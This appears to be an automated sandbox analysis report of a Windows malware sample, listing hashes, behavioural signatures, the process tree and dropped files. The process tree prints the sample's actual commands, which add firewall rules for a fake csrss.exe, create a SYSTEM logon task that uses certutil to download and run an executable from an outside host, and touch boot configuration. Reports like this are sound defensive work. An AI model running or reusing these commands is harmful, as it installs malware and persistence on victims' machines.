Analysis
-
max time kernel
6s -
max time network
77s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 21:31
Static task
static1
Behavioral task
behavioral1
Sample
ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
Resource
win10v2004-20220414-en
General
-
Target
ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
-
Size
3.8MB
-
MD5
faded794f263120377f79cc3cf35e11d
-
SHA1
4add6c66e14478dbd953e05e0bce6844a702618f
-
SHA256
ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982
-
SHA512
b41885525518325a0f82753ea340cc7118ae32c8aba57ecce9136571e4fed7f2c4bca09ef990685413c03d9d920635194b2e0145e07d181541a3bc0bdb76c7b4
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 3476 bcdedit.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2576 2280 WerFault.exe ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe 424 2040 WerFault.exe ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2836 schtasks.exe 3404 schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 7403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 6202⤵
- Program crash
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2280 -ip 22801⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2040 -ip 20401⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
272KB
MD5c4b96699047584583dbc95cc86788b0a
SHA1c64e88cc4d16723349deff660563def488a735c8
SHA256df6086d28af0d44baceb69a81b6a037932c5b779495f99573bc7c8797d43bd34
SHA512f6b11dcdcba9ed678ca2db3bfa649f8db44896b387da720562c2c16dfb30c1b0d7a3d235a50f23d65bf48dfd00d1773a6a2125af6d029020dbcb38d1c8d9baa6
-
C:\Windows\rss\csrss.exeFilesize
399KB
MD5794f5c41d565d7e50eb863cf1c059c54
SHA13d3c8db7e91625fdf656442984d1b55a71d83f5b
SHA256f8af516ec0e0d64381bf7cb2b8d3d8cee910c4b2c42ce0f4920b94377f728f5d
SHA51260f49a884b5948b596222552cfc16ddac118ec4e2c732e856728ff80ffa34a289a536cffd26957d5835d1bcf301cca415ae258e018aa3534de30ec36888bf203
-
C:\Windows\rss\csrss.exeFilesize
253KB
MD5a3c8e6a1e954fdf0014aee5d896a0655
SHA1366d412275b7fa117eff7f76c5bbe045417e2be1
SHA256c782d874a603c001d1bb28913d33f8db846d4395a847f13e7763af47417a62e8
SHA5121620603f9d0972bbdf1bbfb609ca38b3b9ec5691746678501385396d2ff3e1edb174fe47084107a663e8958dc46c54c3993d1c7723080b85d10c1b277431a8ef
-
memory/876-138-0x0000000000000000-mapping.dmp
-
memory/1852-145-0x0000000000400000-0x0000000000BFB000-memory.dmpFilesize
8.0MB
-
memory/1852-140-0x0000000000000000-mapping.dmp
-
memory/1852-144-0x0000000001800000-0x0000000001EF5000-memory.dmpFilesize
7.0MB
-
memory/1852-143-0x0000000001400000-0x00000000017A6000-memory.dmpFilesize
3.6MB
-
memory/2040-134-0x0000000000EF1000-0x0000000001297000-memory.dmpFilesize
3.6MB
-
memory/2040-135-0x0000000000400000-0x0000000000BFB000-memory.dmpFilesize
8.0MB
-
memory/2040-133-0x0000000000000000-mapping.dmp
-
memory/2132-137-0x0000000000000000-mapping.dmp
-
memory/2280-132-0x0000000000400000-0x0000000000BFB000-memory.dmpFilesize
8.0MB
-
memory/2280-130-0x0000000000E6C000-0x0000000001212000-memory.dmpFilesize
3.6MB
-
memory/2280-131-0x0000000001220000-0x0000000001915000-memory.dmpFilesize
7.0MB
-
memory/2352-148-0x0000000000000000-mapping.dmp
-
memory/2836-147-0x0000000000000000-mapping.dmp
-
memory/2980-139-0x0000000000000000-mapping.dmp
-
memory/3404-146-0x0000000000000000-mapping.dmp
-
memory/3476-150-0x0000000000000000-mapping.dmp
-
memory/4216-136-0x0000000000000000-mapping.dmp